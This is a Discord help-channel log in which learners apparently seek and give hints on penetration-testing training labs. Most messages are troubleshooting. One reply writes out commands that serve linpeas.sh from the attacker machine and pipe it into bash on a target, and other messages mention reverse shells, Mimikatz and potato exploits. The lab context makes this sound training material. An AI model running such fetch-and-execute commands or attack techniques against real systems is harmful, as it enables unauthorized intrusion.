#modules

1 messages · Page 423 of 1

proven gust
#

talk to me private

cloud urchin
#

Just tested for you, works fine for me

compact patrolBOT
cloud urchin
#

You can read my link above

terse sedge
#

@rustic sage Yes, and got: Error: Internal Error, ordering was unable to handle the media swap

tawdry palm
buoyant torrent
#

hello can anyone help me in password attack new skill assessment

terse sedge
#

Yes, when running sudo apt install dislocker

#

And it just runs from any directory, like it's on the path?

gray yacht
buoyant torrent
paper imp
#

Guys any help will be much appreciated, iv been stuck on credentials hunting in network shares in password attack module please please please help

#

I have answered first question but the second one i cant. I found thr second user through rdp using given mendres credentials i cant enumerate the shares and permission with second user but cant find the password for administrato

sour plaza
faint hamlet
sterile ruin
#

please whoever wants to help I will be very grateful

cloud urchin
#

That isn't what this discord is about.

sterile ruin
#

ok

#

I just tried

#

Sorry if this is too much

cloud urchin
livid mural
#

can someone help me with the zap fuzzer section please? because I don't know where or I'm supposed to learned to; (use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames)

#

I've been stuck here since my earlier question

#

where can I go to learn how to use ZAP to fuzz for different md5 hashed usernames

#

I am not getting a request with a cookie. everytime I enter the ip in for the URL that this section provides, there are no cookies in the request

#

so how do I send the proper correct url the is goign to have a cookie in the request so I can fuzz

faint hamlet
#

did you visit ip:port/skills?

waxen totem
#

/skills/

livid mural
#

seriously not trying to be upset because i have been stuck for so long and read this question for 5 hrs

#

guide through this like i'm 12 because how else am I suppose to read it

waxen totem
#

it's all explained in the section how to do all this

livid mural
#

HOW?

waxen totem
livid mural
#

Do I fuzz the request?

waxen totem
livid mural
#

okay thats what i've been doing

#

there is no cookie in the request to fuzz

waxen totem
#

because it had just set the cookie

#

refresh the page

livid mural
#

it sets the cookie in the response not the request

waxen totem
#

first time you visit: it sees you have no cookie, it gives you one
second time you visit: it sees the cookie

livid mural
#

DAMN!

#

smh feel so stupid

#

i am able to proceed. thank you for your patience because boy I was over here about to pop a vein

split hound
#

hi all, for module 35 section 223 (web requests, page 4 http headers) what site am i supposed to visit?

#

the default one when i open up firefox gives me an error

#

the question says the server will load the flag after the page is loaded, but i dont understand what page - unless its the default, in which case it seems broken for me

cloud urchin
split hound
#

ahhhh ok it might be silly but i did not expect to have to go to that page

#

it worked, thanks

signal hound
#

anyone down to review my CPTS report example ?

waxen totem
signal hound
#

its for the module documentation & reporting

waxen totem
#

same answer

signal hound
#

bruh

eager ledge
eager ledge
#

Why though?

waxen totem
#

@proud pine used to do report reviews they told him to stop

eager ledge
#

I was hoping I could practice report writing in this module and get feedback on places that required improvement.

#

@proud pine Did they specify the reason why asked you to stop reviewing report?

proud pine
#

I always felt like it wasn't any different than what generally goes on in this channel, but they disagreed.

misty current
#

As long as it's just the module report. There shouldn't be a problem to get help, especially from those that already hold CPTS

proud pine
#

but unfortunately no, they put a full stop to it.

inland oak
#

i tried everything and no working at all

tall saffron
wary wren
#

Can anyone help me in password attacks skill assessment i got into bdavid machine using evilwinrm on jump01 but now i seem to be stuck

faint hamlet
faint hamlet
#

Yup

inland oak
#

😦

faint hamlet
#

sure

tall saffron
#

hi guys!! anyone who can check the lab for "HTTP Response Splitting" and can make a sanity check wether the admin visit the link because i have the payload working for me and i know how to write the admin cookie without an external server but get nothing back, i tried double and triple encoding, still didnt worked

#

i can write anything i want through the xss to the log with my own user but nothing with admin user. I even set a cookie for my user and i can via CRLF XSS write it to the log

#

i tried multiple url encoding

young smelt
#

Hey, did you set up pivot? I have no luck with lingolo and chisel from my machine and pwn box also...

faint hamlet
crimson leaf
inland oak
young smelt
# faint hamlet ligolo is working on password attacks new skill assessment

Ligoli is working but nmap scan for hosts mentioned in lab description shows:
All 1000 scanned ports on 172.16.119.11 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
All 1000 scanned ports on 172.16.119.13 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

faint hamlet
waxen totem
#

Damn mans deleted his message

lucid grail
#

Hello I am stuck at Brute force Skill Assessment . I completed Part 1 and found out correct user name using hydra . I used the same username on Part 2 and used mdusa for ssh service . Although they are telling ftp user basically it ssh port ( found out by nmap) . I also successfully found out password using mdusa . But can not find correct answer for both questions on part 2 . Please help me

clear pulsar
#

hmm hello guys, can anyone recommend me a beginner roadmap/list to start? i feel so overwhelming

untold plover
#

Hello, can I ask a question? The question is, don't you notice that when you stop doing active machines in HTB, the points stop increasing? I mean, you have to do about 3 machines to see the progress.

primal eagle
#

Installing odat.py

for the people who have issues with oracle tns installing odat:

start a virtual environment:

python3 -m venv venv

source it:

source /venv/bin/activate

then install it with:

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome
pip3 install pyasyncore

and now it should work.

You can run it with source /venv/bin/activate and then run python3 odat.py.
Or you can run it with: ./venv/bin/python3 odat.py

(of course initiate the venv when running)
and if it doesnt work for you, dm me with a screenshot

You are on Ubuntu 24.04

Since you are already heads deep into this, I am a ubuntu user, so here is how I did it to fix some dependency issues:

In case of missing libaio1:

sudo apt-get install libaio1 -y && sudo ln -s /usr/lib/x86_64-linux-gnu/libaio.so.1t64.0.2 /usr/lib/x86_64-linux-gnu/libaio.so.1 && sudo ldconfig

Which would fix the issue of missing libaio1.

stuck wolf
#

Hey, im working on the privilage escalation section in the getting started module (module/77/section/844). I managed to do the first task and move to user2, however, im unsure on how to proceed next. I need root access, but i'm not sure how to get there

#

i dont get how to run linPEAS on the machine

sick depot
#

client_loop: send disconnect: Broken pipe is it supposed todo this on the lpe skills assessment when logging in via ssh it just keeps logging me out?

alpine ingot
#

I am stuck on the windows privilege escalation skill assessment part 1.
I got the revshell on the machine, enumerated privileges, checked common folders, etc. Cant find anything about an ldap admin.
I tried using the juicy potato and stuff but to no avail. I then tried using some CVE to create a new account and even tho i ran it and didnt get an error, i was not able to do anything with it, it never even made the account.
I feel like i spend like 2 hours going down the wrong rabbit hole and havent even gotten to question 2 yet.

stuck wolf
harsh laurel
#

I need help with Credential Hunting in Network Shares for both questions. I am so lost, i have tried running both Snaffler.exe and Powerhuntshares but to no avail.

alpine ingot
#

you can, smb, copy paste into nano, http server, scp, ftp, etc.

stuck wolf
#

I see, thanks. I’ll have a look again later 👍🏻

gray yacht
stuck wolf
mighty valve
#

hey guys, if anyone can help me with the logrotten section of linux priv esc module it would be appreciated. I've tried having the payload do a reverse shell and move the file im trying to read, but both arent getting executed, even though its telling me its writing the payload. thanks

#

omg nvm literally ran it once more and worked

mighty valve
stuck wolf
# waxen totem its like a 1 in 20 chance

sorry to ping you, but would you be able to point me in the right direction in my task? im doing the Privilege Escalation section in the getting started module, but i keep having issues with linpeas

stuck wolf
#

nvm ill try linEnum

waxen totem
#

enumerate

#

normally

#

Kek

primal eagle
#

on what are you stuck?

forest zenith
#

I got you now lol

#

Thank you anyways

primal eagle
#

?

stuck wolf
#

the hint is "dont forget to chmod"

primal eagle
stuck wolf
primal eagle
stuck wolf
#

when trying to run the linpeas script

primal eagle
#

oh wait

#

you are running linpeas.sh? And how are you running it?

celest peak
primal eagle
#

are you running it remote?
Like for example curl yourip:port/linpeas.sh | bash?

stuck wolf
#

then the github site

primal eagle
#

yea thats the issue

#

the box does not have internet access

#

you have to download it to your own machine, and then transfer it from the machine to the box

stuck wolf
#

but i couldnt get a connection

primal eagle
#

ill give you some commands

stuck wolf
#

thanks :)

primal eagle
#

on your machine

get the linpeas.sh

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh

Now transfer it:

cd /tmp && python3 -m http.server 1337

on the target machine

curl -s http://yourip:1337/linpeas.sh | bash
#

there you go, that should run it

stuck wolf
#

thanks, ill give it a try. i've gotta use the tun0 ip, right?

primal eagle
#

yes

#

but this is common sense, so if you don't understand this yet, i'd recommend diving deeper into the basics of linux

stuck wolf
#

it didnt work, i didnt get any output at all.

#

maybe theres some configuration with my firewall that messes things up?

primal eagle
#

mind sending screenshots and/or command output?

stuck wolf
#

sure, no problem.

#

hold on a sec

#

it didnt give any output at all, i also tried just running curl http://ip:port and the same thing there

primal eagle
#

first of all i'd recommend using a VM, to prevent breaking your system after some time installing tools

autumn pilot
#

The target cannot reach you, you are attempting to download a file using the IP address of the VPN, whereas the target doesn't know and is not associated with it. The target is a docker container.

primal eagle
#

yea you should look at your interfaces again, the docker should have its own interface (if you are running this container locally)

stuck wolf
autumn pilot
#

The docker container is not configured in a way that allows you to download files over the internet

stuck wolf
#

finally.... i just copy pasted the script and used vim

primal eagle
#

but when in a reverseshell, its not really easy to execute something like vim or nano

#

since it would not render good

austere hound
#

what are those errors?I m a step ahead of you, installed all the necessaries to mount the vhd file , but I do not have the password to decrypt it with dislocker cmd. Do you have the password to unzip the "*.zip" file from the previous question?

#

Hello Evan, i m trying to mount the vhd file, but I don t have the password from the previous question to decrypt it(i had already solve the first question before the modifications to this module applied 5 days ago more or less, and probably mine is outdated or not correct). Can you gave it to me please via dm?

primal eagle
uneven obsidian
#

hey, i am currently on module FILE UPLOAD ATTACKS, blacklists filters.

I am trying to use ffuf and not burpsuite to fuzz for the extension but im failing, i finished the exercise with burp.
Someone who did it using ffuf and can help with me the command and the file request ? i am seeking to solve it using ffuf ^^

stuck wolf
obsidian siren
#

"I've been stuck in a cloud of confusion for over six months now, and it's eating away at me. Deep down, I know cybersecurity is what I want—it's what excites me, drives my curiosity, and gives me a sense of purpose. I want to become an ethical hacker. I’ve built up some knowledge of networking and tools, and I’ve even explored platforms like Kali Linux, Metasploit, Burp Suite, and Wireshark.

But the truth is… I feel lost.

Some days, I dive into bug bounty hunting, but I don’t understand what’s really going on—and I end up quitting. Other days, I jump into using tools like Metasploit or Burp Suite without even knowing why I’m using them. And then there are days when I go back to square one, starting with the basics all over again.

It’s like I’m running in circles, overwhelmed and directionless.

I don’t need more random videos or tools—I need a clear path, a step-by-step guide, a mentor to help me connect the dots. I want to stop wasting time and finally take control of my journey in ethical hacking. I know I’m passionate. I know I’m capable. I just need the right structure, support, and a solid roadmap to follow.

Please help me find that path

proper comet
#

Do you resolve it?

proper comet
#

the two file ccache are expired to 2022

alpine ingot
stuck wolf
still lodge
#

Damn 👀

uneven obsidian
last musk
#

Hi I am doing the SQLmap Essentials Skills Assessment challenge on hackthebox academy I am struggling to even find the right page to do the sql injection I checked all the pages and the forms to look for a post request to inject and I have also checked the burpsutie history for post request any tips?

fathom pendant
rose hawk
#

Same here. Are you able to grab the flag?

crude ember
#

What the Time Means (e.g., “2 hours”, “3 days”) ?!

digital sigil
#

Estimated time the module will take to complete?

rose hawk
#

I'm facing the same issue. Got flag?

crude ember
fathom pendant
languid ginkgo
#

Hi,
I'm stuck on Introduction to Windows Evasion Techniques->Static Analysis, ThreatCheck print No threat found!, the log file in the VM say me

[06/09/2025 08:10:32] Checking...
[06/09/2025 08:10:32] C:\Alpha\Static\notMalware.exe - OK - Undetected by Microsoft Defender Antivirus

but the flag never appears.

Does anyone have any idea how to debug the problem ?

cloud urchin
vast smelt
#

Hello! I am trying to set up Proxmox for the first time. When I enter the address it gave me it is timing out so I can not get into the web dashboard to complete the setup. Any suggestions?

silk lagoon
main ridge
#

Hi. I'm doing the Linux Privilege Escalation Skills Assassment and I'm having trouble with the machine... It randomly disconnects and when trying to log in again it fails several times until I can log in as htb-student. Is this part of the assignment? Already tried with reset

fathom pendant
#

try changing vpn regions

quaint cliff
main ridge
sick depot
#

client_loop: send disconnect: Broken pipe
anyone had this error when logging in via ssh keeps logging me out with this error

quaint cliff
sick depot
quaint cliff
#

bc i had the broken pipe error due to lag

sick depot
#

tried changing vpn regions still the same

potent geyser
#

Hey guys i have got a ISh Alpine

#

And it says localhost server

#

What means?

candid echo
#

NTLM Relay Attacks Skills Assessment
Hi guys! Currently working on skill assessment here and got stuck on the question 4 for few days. Can I have a nudge? So far I understand it is something related to Farming Hashes even I have the sqlftp credential from question 3.

gray yacht
candid echo
gray yacht
main ridge
sly night
#

hi

#

i am new to this server

#

i just got to know about hacker box

#

can one give me a run throug or a guid to how to start doing ctf n all

primal eagle
#

lmao

gray yacht
terse quiver
#

Hello guys ! can I have an explanation of this question : How many incoming explicit object controllers exist in the Domain Users group? (It's from Bloodhound module, Analyzing BloodHound Data section)

quaint cliff
#

"explicit object controllers " is one of the info you can get from the interface pretty easily "no need to make custom queries"

summer bronze
#

Is there anyone here who can teach me ethical hacking?

quaint cliff
summer bronze
#

@quaint cliff I don't know

#

.

quaint cliff
jaunty grotto
#

Would it be better to get a degree in computer science or cybersecurity?

#

If I want to work to security/ pentesting in the future?

compact patrolBOT
fathom pendant
#

@summer bronze ^

rain crag
#

Anyone have tips for the Password Attacks - Credential Hunting in Network Shares module?

I've located the first set of credentials, answered the first question & am using the second account. I found a credential in one of the shares that the second user has access to that I thought was the answer to the 2nd question ... but it won't accept it as the answer so I guess not. I've run Snaffler as both users, PowerHuntShares & manual searches with the Powershell command shown in the module (various patterns related to credentials)

If someone could nudge me in the right direction I'd appreciate it

stuck hollow
#

hey people, need a hint or help any kind on module Pasasword Attack section Pass the Certificate, i dont know what am i doing wrong, im following steps and cant get ./DC01$.pfx cause connection goes down.

fleet fern
#

guys i stuck on Windows Privs Esc Skills Assessment Part1 when i try to download JuicyPotato on the Target VM and then try to execute it i get an error telling me "This version of C:\Users\Public\jp.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher." Why only me getting this error ?
even if i try other executable from other sources i get same issue, also tried to build the exe myself (same result and error)

mighty valve
spring root
#

Can't capture the Beacon Message, where you can find at EAPOL. Wi-Fi Penetration Testing Basics - Skills Assessment

main ridge
fringe glade
#

Hello everyone! I am on the "Attacking Web Applications with Ffuf" module, on "Skills Assessment". I am stuck on third question saying "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?". I found the page but when I try to submit the answer it says "Wrong answer". I have tried submiting the full url (+port), url without port, url without port and without "http" in front and nothing seems to work. Does anyone have any suggestions?

vocal pier
#

Hi, i have a question can anyone help to track someone bc someone create fake acc on ig with my photo and i want to know who is that

sand kindle
#

Hello, the host in exercise Attacking Windows Credential Manager is unstable as hell, is there any issue here ?

rain crag
gray yacht
gray yacht
gray yacht
rain crag
stuck hollow
gray yacht
frosty crescent
#

that might be it

fringe glade
#

Thanks for the tip! Turns out that I did not read the hint correctly. I needed to replace the port in the url with the word PORT. In the end, it was easier than expected

west arrow
#

no one can help you with that

#

this is for PenTesting, has nothing to do with ig accounts

#

NO

sage void
#

Lol

warm pumice
#

anyone did the new LLM Output Attacks module

#

have a question

sick geyser
#

Hello, I know a little bit about networks and I really want to start learning cybersecurity and I don't really know what I need to learn to know and apply this field in vulnerabilities and defenses and I would be happy if I need to learn for this field.
In the field of pentesting, ethical hacker in and red teaming cybersecurity

#

I would love tips on how to start learning.

flint palm
#

start from the beginning modules like learning process and so on and get deeper into the hacking world

sick geyser
#

thanks

flint palm
#

you know when you gain new knowledge understand how things are going you will be discovering new things to learn and get deeper into the theme and you will understand yourself what you need to study what you want to study))

sick geyser
#

true you are right

cold star
#

Hey Guys, I am doing password attacks I am stuck at the new section: Atcking Wndws Crentl Manager One I have bypassed UAC but still even after system32 I get privalage error in mimikatz

#

I am able to log into mcharles and sadams with system32 but yea still get mimikatz error

#

And also runing dpapi keys with mimikatz srill it crashes

gray yacht
#

This is not the channel or server for that.

lethal cypress
#

hey, sup? am I the only one not managing to connect to tombwatcher.htb via targetedKerberoast cuz "invalid credentials"?

opal cape
#

Hey anyone here can help with XSS module?

#

Session hijacking to be exact

#

Im confused about how to test a payload in each field. Am I supposed to have a listener running in my vm attack box?

fathom pendant
fathom pendant
#

You test each field to call back to your machine

torpid kiln
#

y cant i message in general?

fathom pendant
torpid kiln
red juniper
foggy snow
#

Hey, currently doing the Attacking Windows Credential Manager section in the Password Attacks module, I have found the needed password using lazagne but was hoping someone could help me do it using mimikatz with UAC bypass

waxen totem
hard mango
#

Hey

quaint cliff
#

Hello. Did anyone finished the "crackmapexec" module? i would have a few question on the skill assessment

hard mango
#

I can't get past the IDS/IPS Evasion Firewall module. I've run everything on nmap and it always shows as filtered.

#

I tried this and more

astral meteor
#

um wait this error?

fathom pendant
hard mango
#

I did with -sV

fathom pendant
#

Don't see that in either of your images

hard mango
#

But always filtered

fathom pendant
#

Reset target and try again? Maybe your earlier scans tripped the ids/ips

hard mango
#

I did it

#

Is it an error in the module?

lethal cypress
waxen totem
real trout
#

idk if I'm dumb or there's a bug. I am doing Linux Fundamentals and stuck on the question:

"Which kernel release is installed on the system? (Format: 1.22.3).
which I ran uname -a got 6.11.5 but tried every variant 6.11, 6.11.0, etc. even 6.11.5-1parrot1.
&
"What is the name of the network interface that MTU is set to 1500?"
which I ran ip link got ens3 & tun0 both were wrong even tried different variants like enp0s3 but none of them work. So idk if my work station is outdated or the questions/answers are or what's going on. Any knowers?

waxen totem
real trout
#

I believe so that's the "Target(s): right?

waxen totem
#

yeah

real trout
#

yes I have my target, am I supposed to plug it into the workstation myself? I was under the impression you click it then open the station and it should be setup

waxen totem
#

ssh <target-username>@<target-ip> then put in the password that you're given

#

If you're using a personal VM you'd have to be connected to OpenVPN

real trout
#

thanks let me check

rustic sage
#

Hello

lethal cypress
spice heart
#

Just started working through CPTS, reading about CT logs in the subdomain enumeration section. I'm pretty sure I'm misreading this - it looks like there's a public record of every subdomain? isn't this just significantly stronger than brute forcing the subdomain enumeration?
I must be missing something but I don't see what. There's no way that looking at Censys or cert.sh is just better than using gobuster / ffuf / etc

cloud urchin
#

No, they don't hold public records for all subdomains. One example is you can have a wildcard *.domain cert that covers any subdomains you have. It doesn't list each individual sub domains.

spice heart
#

Gotcha that makes sense, I was like this seems insane to have out in the open

real trout
# real trout thanks let me check

ya so anytime I do the ssh htb-student@IP Address then it asks for the password in grey and doesn't let me type the password. I use the pwng box I even tried doing the IP number it gave me and just posting it in the web browser but that's doesn't work either

#

I use windows on this pc and don't use a VPN, so should I not rely on the pwnbox?

#

I figured I was going to have to do this. The reason I am learning the Linux Fun. is so I can download Linux Arch on this thinkpad I bought to do all that stuff lol

#

wompwomp lmfao so I guess for this thinkpad I'll do that then buy a different one in the future to download arch

cold star
cold star
stuck hollow
#

and every time i do it ca01 ip's goes down

fathom pendant
#

please don't share module info like passwords and such

crystal arch
#

Hello everyone I’m severely new to all this
Including using discord
I’m currently going through the recommended start path Information Security Foundations
Trying to set up the VM with virtualbox and proxmox but i have been unsuccessful so far getting prox to open in the box. Any help with this would be greatly appreciated as well as any tips on if im starting my cybersecurity journey correctly and what i should be learning or studying

fathom pendant
#

you don't need to set up proxmox

#

the setting up module is more of a rough guide than a pure tutorial

crystal arch
#

Lol ok thanks I’ll continue on then

stuck hollow
#

hey people, someone can help me trying to fix oscrypto from PtC and its not working

lime sky
fleet fern
rustic sage
#

how to get through this one guys

autumn pilot
#

Make sure you have SSH'ed into the target

junior ruin
#

Good Morning together, I need help with the "Fundamental Linux" module. I hope I'm right here!
I can't connect via SSH to the Docker Container and I really dont get the problem. I wanted to do an annual subscription and test some basic stuffs before. Thats the output:

└─$ ping 10.***
PING 10.1*** (10.129.170.232) 56(84) bytes of data.
64 bytes from ***: icmp_seq=1 ttl=63 time=54.7 ms
64 bytes from *** icmp_seq=2 ttl=63 time=37.8 ms
64 bytes from ****: icmp_seq=3 ttl=63 time=49.0 ms
^C
--- **** ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 37.802/47.168/54.656/7.007 ms
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ nmap 10.***           
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-10 03:59 EDT
Nmap scan report for 10.129.170.232
Host is up (0.037s latency).
Not shown: 991 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ssh htb-student@10.1****2
^C
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ ssh htb-student@10***32 -p 22
^C
                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ nc 10.1****2 22           
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
^C
     ```
feral nimbus
inland oak
#

....

junior ruin
#

Side note: Labs are working for me

feral nimbus
#

I would suggest try connecting to ssh server through the pwn box. I suspect something might be wrong with your ssh client.

#

And I assume you have tried to restart the target if you haven't do try the classic turn it off and on again.

junior ruin
#

I tried this. But it also doesn't works. I also tried different VPN connection files... But it seems it must be a problem on my side, so I'll go for troubleshooting. Thank you very much 🙂

feral nimbus
junior ruin
#

Pwn box worked, but it feels different and was a little bit slow yesterday. maybe due high traffic in the evening

feral nimbus
#

You can also ssh into the pwn box if GUI feels slow and you need/want to use the pwn box.

junior ruin
waxen totem
dapper roost
#

Hi guys! Are there any modules on ROS2 security or anything similar?

sick depot
#

LPE skills assessment is still broken for me how can i raise this issue?

storm elk
#

what do you mean by broken? @sick depot

#

I did the module a few days ago, didn't have any issues

sick depot
#

When i ssh in it logs me out straight away saying broken pipe

storm elk
#

What vpn type are you on and on which region?

#

are you using pwnbox or your own vm?

#

works fine here on pwnbox

forest zenith
#

Hello! Im doing the module documentation and reporting, and got curious about the tools to report mentioned

#

I mostly use ms word or markdown

#

does anyone use another one, and like it?

storm elk
#

a lot of people use SysReptor

sick depot
storm elk
#

Maybe its best to contact support

strong sierra
#

Hi, might be the wrong channel but still gonna ask, anyone had issues with the flag in the NMAP Enumeration, Scripting Engine section?

storm elk
#

my instance is still working and I just got flag 1

strong sierra
#

In short, i got the flag using -A -T4, but the flag is invalid.

storm elk
#

Please dont post the flag publicly

#

dm the screenshot to me and I will check

strong sierra
#

Alright. Didnt think much about the flag in public

acoustic owl
#

Which module do you need this for? Normally links are included in the modules if necessary

south marten
#

Hello, I'm taking the Password Attacks course and I'm in the section on attacking Windows credentials using Mimikatz. The problem is that I don't know where you run it, since the Windows Server machine doesn't have internet, I can't become and administrator because I don't have a password, and I don't know what to do.

#

I can login With mcharles

#

But I dont know where I need to execute mimikatz.

storm elk
#

No administrator access is needed 🙂

south marten
#

The example in the Section is With the User administrator

storm elk
#

Not all the questions are solved by copy/pasting the section's content

south marten
#

Yea, I know, but i dont know what I need to do

storm elk
#

There's other tools mentioned

south marten
#

So, I dont need to use mimikatz

sick depot
#

@storm elk best way to contact support?

compact patrolBOT
storm elk
#

there's an email at the bottom - or via the live chat

wild violet
robust pecan
#

Good morning everyone, I need help on the File Upload Attacks module, the Whitelist section. I have not been able to get a web shell, but I have tried everything the module suggests. I even tried to upload the web shell with every allowed extension. But it doesn't work and I don't know what I'm doing wrong.

astral meteor
#

ayyy yooo

#

hello @everyone

storm elk
#

😉 also hello

prime pewter
#

I'm doing the Skills assessment for the WiFi Evil Twin Attacks and I'm confused on my last question. I have 2 of the 3 answers, but any attack I have tried so far I am not getting anywhere. I've tried the manual Evil Twin attack but apache isn't installed and I can't install it. The Karma and Mana attacks kinda seem to work but nothing gets written to a .hccapx file for me to convert it. It's a PSK Network, the only automated tool I have on this box is WifiPhisher and eaphammer, but neither taught about using against this type of network in the course.

I know I'm missing something, so please just give me a hint to help me out . If someone could point me in the right direction, that would be very helpful.

tribal plinth
prime pewter
tribal plinth
#

What section has that word in it?

#

If you follow the section you should get the flag.

prime pewter
# tribal plinth What section has that word in it?

SSL Interception, which I have been using with Ettercap but nothing shows up. I do get a host in there but when I begin the SSL Intercept and the ARP poisoning, nothing comes back.

But I will try again. Thank you

tribal plinth
#

You need to make sure all clients are being connected to your rogue AP

gray yacht
sharp relic
#

Hey guys I am working on the getting started module trying to solve the nibbles box. I haven't been able to look up the target ip. I have tried everything i could think of and used any information i could find. I am very new to this world and not very educated yet. Any tips would be very helpful. Thank you!

red echo
#

I need some help on Password Attacks section Credential Hunting in Network Shares
i tryna run the command like the instruction for PowerHuntShares but didn't work

gray yacht
gray yacht
red echo
#

and btw do u know what shares the first question is talking about? I have tried all 3 shares i can access to but nothing seems suitable

forest zenith
#

why is the academy VPN so slowwwwww

gray yacht
forest zenith
#

i bet someone is mining monero on academy machines

clear seal
#

Apparently the spawns are down?

#

Nvm just spawned lol

red echo
#

I tried every files on the shares but cant find nothing but dummy credentials

gray yacht
red echo
#

i tried logon to the user i found

gray yacht
red echo
#

then recheck the shares folder i dont have permission from the previous user

signal lava
#

Hey, a quick question: is there some specific rules when we submit an answer during a module's question ? I am sure of my answer (double check done on my side) but... not working... so, I really don't understand

gray yacht
signal lava
#

Now, it's just a simple question:

#

And the answer is very easy (As said, I crossed check) but... Apparently not working

#

However, I am 100% sure of the answer

signal lava
ancient niche
#

Good Afternoon guys

#

i need little help with the module AI

gray yacht
faint hamlet
slim locust
#

YARA & Sigma for SOC Analysts
Page 5
Hunting Evil with YARA (Linux Edition)

Can someone help me with this problem? I am for some reason not understanding what processes I am looking for when I do the yarascan.

south marten
vernal tapir
#

Hello, hope you all have been well.

I'm reviewing File Inclusions today, and I am having an issue on "Server Log Poisoning,
I'm attempting to poision /var/log/apache2/access.log via BurpSuite

  • Changed User Header to a PHP Webshell >> Send

It seems i'm either destroying or breaking the log file every time, not able to get the results shown.
(500 Internal Server Error)
Anyone got an idea what I could be doing wrong?

(Image deleted to redact IP)

plain spruce
#

hey guys i struggle with the module footprinting -> smb
i dont understnad what they want from me in this question:
"What version of the SMB server is running on the target system? Submit the entire banner as the answer."

I can answer the other questions but i cant that one?
what is the "entire banner"?
I see like 3 different versions
nmap scans - 2-3 different ones on here
and there is a version on comment on smbshare
like im so confused??

nmap shows versions:
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2

fingerprint-strings:
| GenericLines:
| 220 InFreight FTP v1.1
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 InFreight FTP v1.1

and on comment i see
sambashare READ ONLY InFreight SMB v3.1
[6:55 PM]
there were some modules with similar questions and i feel like i just am able to answer them with luck sometimes bcs that example above happens to me more often now where i see different versions and i dont know what they want when they ask for entire banner i feel lost. would really appreciate some help

vernal tapir
#

I think they want X.X.X as your answer

faint hamlet
vernal tapir
#

Since you already have the answer, this might explain better.

PORT    STATE SERVICE  |   VERSION
139/tcp open  netbios-ssn | Samba smbd 4.6.2
445/tcp open  netbios-ssn | Samba smbd 4.6.2

@plain spruce

#

The question is asking for you to grab the entire banner of the "VERSION"

So copy everything after the PIPE ( | )

plain spruce
#

tried both of your approaches @vernal tapir @faint hamlet doesnt accept it.
i tried:
139/tcp open netbios-ssn Samba smbd 4.6.2
netbios-ssn Samba smbd 4.6.2

#

nvm this worked: Samba smbd 4.6.2
..

vernal tapir
#

lol

#

R E A D

plain spruce
#

in my head the entire time
"139/tcp open netbios-ssn Samba smbd 4.6.2"
this is the entire banner.
not just "Samba smbd 4.6.2".

vernal tapir
#

Did you already do Linux Fundamentals?

plain spruce
# vernal tapir R E A D

i did. and it says:
What version of the SMB server is running on the target system? Submit the entire banner as the answer.
"SUBMIT THE ENTIRE BANNER"

vernal tapir
#

If not, highly recommend you do that

#

Yep, I know it's a little misleading for someone starting out, just to let you know majority of the questions are similar to that, requiring you to fully understand and read the questions. We all struggled through it at least once lol

plain spruce
vernal tapir
#

That's nothing

#

You're gonna have fun trust me 😄

faint hamlet
plain spruce
#

so the thing is i dont know what a banner is i guess?
if i see this as a answer from nmap:
445/tcp open netbios-ssn Samba smbd 4.6.2
how tf should i know that only the last part is the banner if i normally would think the whole thing would be a banner. maybe im just dumb i dont know

#

sorry for swearing btw. am kinda riled up because i sit on this question already for an hour.

faint hamlet
plain spruce
#

so can i like say that the last part of nmap scan outputs is always the banner or how do i identify a "banner"?

faint hamlet
plain spruce
#

the banner script still gives me the whole line there is barely any difference.

so i have to basically assume that the last part is the banner

or like u say connect manually and hope for a greetings msg?

#

also when i do this
nc $ip $port
it just loads in terminal and then just stops - nothing happens

hallow light
#

Role

vernal tapir
#

Man, my last Skills Assessment took me 2.5 days of enumerating, 5 mins of exploitation.

@plain spruce You need to focus hard on trying to not get so frustrated, spending an hour trying to get an answer is annoying but you MUST be expecting it, and only be happy when you achieve the results, reflect back on WHY you spent that much time, and for next time try to always just do it better 🙂

plain spruce
vernal tapir
#

Bro again, I spent 2.5 days looking for an answer that took me 5 minutes to actually get

#

You're not alone at all brother

plain spruce
#

i mean i literally got the flag in 2 mins and spend 1 hour formatting the answer for the first questions and just didnt want to work so dumb lol

#

yeah

vernal tapir
#

Next time you feel stuck, go take a 15-20min break, when you come back READ the entire lesson again, and re-try. Your best way to remember/learn.

plain spruce
#

i wonder if they do like a trim on that input field bcs that doesnt feel like it rn

plain spruce
vernal tapir
#

You're overthinking it way too hard rn bro, it will be more understandable as you follow aloong

#

No that tip is 100% serious, that rule I follow for EVERY lesson I get stuck on.

#

If you wish to sit there in frustration, feel free to do so. I'm only giving a reccomendation

plain spruce
